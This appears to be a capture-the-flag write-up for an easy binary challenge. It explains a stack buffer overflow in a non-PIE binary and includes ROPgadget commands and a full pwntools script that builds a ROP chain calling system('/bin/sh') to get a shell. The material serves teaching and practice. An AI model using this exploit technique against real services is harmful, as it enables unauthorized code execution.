Post

PWN1

Description:

binary exploit

Difficulty:

easy

Solve

this challenge is stack-based buffer overflow with stack canary disabled. ROP chain.

steps to solve:

  • figure out the vulnerability using a decompiler like IDA.
  • participants should notice a variable of length 10 that is receiving 170 bytes of input (buffer overflow)
  • we don’t have a win function here so participants should build a ROP chain to call system(“/bin/sh”)
  • we don’t have a LIBC leak to calculate /bin/sh address and system address but those 2 are implemented in the binary which doesn’t have PIE protection enabled.
  • extract system and /bin/sh from the binary using GDB or IDA
  • build the ROP chain and overwrite the saved return pointer with our payload.
  • fix stack alignment to execute the system.

I got the pop_rdi and ret gadget by running these two commands :

1
ROPgadget --binary main | grep "ret"

image

And got the addr 0x40050e

As for the pop rdi:

1
ROPgadget --binary main | grep "pop rdi"

image

and then with pwntool module we can build a python script to get an interactive shell and read flag.txt

i wrote this python script for this task

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *


system=0x400520
binsh=0x400764
pop_rdi=0x0000000000400723
ret_gadget=0x000000000040050e

p=process("./main")
#p=remote("127.0.0.1",9032)
payload=""
payload+="A"*40
payload+=p64(ret_gadget) #stack allignement
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)
pause()
p.sendline(payload)
p.interactive()

and i got the shell :D

image

This post is licensed under CC BY 4.0 by the author.